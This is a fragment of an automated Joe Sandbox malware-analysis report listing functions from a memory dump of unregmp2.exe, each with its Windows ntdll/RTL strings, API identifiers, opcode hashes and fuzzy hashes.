                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: 43622c85f5ec503b20d45a7f567c2bcbf5ede5d00bb42152373e888ae5e7f683
                  • Instruction ID: 9eb855e58627d86c2a5abbe12c21975db274012ea6cef3da382e48c07128b5b4
                  • Opcode Fuzzy Hash: 43622c85f5ec503b20d45a7f567c2bcbf5ede5d00bb42152373e888ae5e7f683
                  • Instruction Fuzzy Hash: 0151E3B17006197BEF21BBA5DCA5FBA73A9FB04305F1440A9E505A7190EB70FE45CE60
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction ID: e781cbe7e10992699868382f6ceaf9c19816b5f83496c92804fec4b3df25d130
                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction Fuzzy Hash: 55818170E052499FDF24CF68C8917FEBBA2BFE5320F18455BD891AB291D634F8418B64
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: eecf0914e96f6f8e73ccdb57c113f4c47f63ed978f583d3c8882c11426ca1ca7
                  • Instruction ID: 007b21ece0b1e4acdaa26ad67767140da2157dc1d3e5ff5a3acaa9e746c3ebfb
                  • Opcode Fuzzy Hash: eecf0914e96f6f8e73ccdb57c113f4c47f63ed978f583d3c8882c11426ca1ca7
                  • Instruction Fuzzy Hash: 81213377A00119ABDB11DEA9DC54AEEB7F9EF54794F440166E945D3200E730E9028BE1
                  Strings
                  • RTL: Re-Waiting, xrefs: 04D7031E
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D702BD
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D702E7
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 701f11ae786f94e1c9289a7d522b32a711f3b4540b5e29ef432f7ea837ea5399
                  • Instruction ID: a44fb950f2a237196f271fed35ad02ae2844336497d926e6b59b50c1166c0ccd
                  • Opcode Fuzzy Hash: 701f11ae786f94e1c9289a7d522b32a711f3b4540b5e29ef432f7ea837ea5399
                  • Instruction Fuzzy Hash: 71E1AA316087419FD725CF28C984B2AB7F0FB98728F140A6DF5A58B2E0E774E944DB52
                  Strings
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D77B7F
                  • RTL: Re-Waiting, xrefs: 04D77BAC
                  • RTL: Resource at %p, xrefs: 04D77B8E
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: 041930baf303d60f415f445a3e24be0a9f5ef97d02e0d4eec488008c0cd507b9
                  • Instruction ID: 05cddd16c0f362ace4598350cee5f355fb8f6192709005b26b9c564c1add85fa
                  • Opcode Fuzzy Hash: 041930baf303d60f415f445a3e24be0a9f5ef97d02e0d4eec488008c0cd507b9
                  • Instruction Fuzzy Hash: 5E41D3317057029FD724DE29C840B6AB7E5FF88725F100A2EF99ADB681EB31F4058B91
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D7728C
                  Strings
                  • RTL: Re-Waiting, xrefs: 04D772C1
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D77294
                  • RTL: Resource at %p, xrefs: 04D772A3
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 92baf85d734efae55e2b2b0f3bf531dd32c8d6ef14c2194f89aa82c053b64958
                  • Instruction ID: 3ddb005bfb317a8825926f7ed7151ed77bd4f7ed1a28c9a7161687dc83b531d1
                  • Opcode Fuzzy Hash: 92baf85d734efae55e2b2b0f3bf531dd32c8d6ef14c2194f89aa82c053b64958
                  • Instruction Fuzzy Hash: 1541D231700202ABDB21DE25CC41F66B7A5FB85719F140A1AFA95EB241EB21F8528BE1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: b664fb21da6e46d78b158f8c7cc7c38d9f349c8ee09f22849496f9f3a4478d26
                  • Instruction ID: 5e500045d76efd0d502e547cd14d2d5254493f5b32173057996e15a0a1b33703
                  • Opcode Fuzzy Hash: b664fb21da6e46d78b158f8c7cc7c38d9f349c8ee09f22849496f9f3a4478d26
                  • Instruction Fuzzy Hash: 68315772A00219DFDF60DE29DC44BEE77F8FB44754F84459AE889D3240EB30BA458BA1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction ID: 819419f1f5d73294da594a6f519d67e227e72e2b72d93fa54a3d0ad55e995a86
                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction Fuzzy Hash: 63918F70F0021A9BDF24DE69C880ABEB7A5FFC4760F54462BE855A72C0E734E9418B70
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: 4eb41cea5db53c6f9363fffc6b3616f6d1538670ad2b03291c7ebd94fdbfbfd9
                  • Instruction ID: d4d2563001fdb1d81d9aab1064abe8dd7acaaaa7044738c6006ba571e7525ede
                  • Opcode Fuzzy Hash: 4eb41cea5db53c6f9363fffc6b3616f6d1538670ad2b03291c7ebd94fdbfbfd9
                  • Instruction Fuzzy Hash: FA811DB1E012699BDB31DF54CC54BEEB7B4AB08714F0041DAE919B7290E730AE84CF61
                  APIs
                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 04D8CFBD
                  Strings
                  Memory Dump Source
                  • Source File: 00000009.00000002.3779961119.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: true
                  • Associated: 00000009.00000002.3779961119.0000000004DF9000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004DFD000.00000040.00001000.00020000.00000000.sdmp
                  • Associated: 00000009.00000002.3779961119.0000000004E6E000.00000040.00001000.00020000.00000000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_9_2_4cd0000_unregmp2.jbxd
                  Similarity
                  • API ID: CallFilterFunc@8
                  • String ID: @$@4_w@4_w
                  • API String ID: 4062629308-713214301
                  • Opcode ID: 792815fb81607845b15415c34010a155a3900aa7ad7d76e883fdc6bf965b1aa9
                  • Instruction ID: e5cfa1431b77991a0ad0cc39bbde640d5737a2f9b86533d64427846aefe6e09f
                  • Opcode Fuzzy Hash: 792815fb81607845b15415c34010a155a3900aa7ad7d76e883fdc6bf965b1aa9
                  • Instruction Fuzzy Hash: DD416F71A00254EFEB21AFA5D840A7EBBB9FF45B04F01402EED15EB2A1D734E905DB61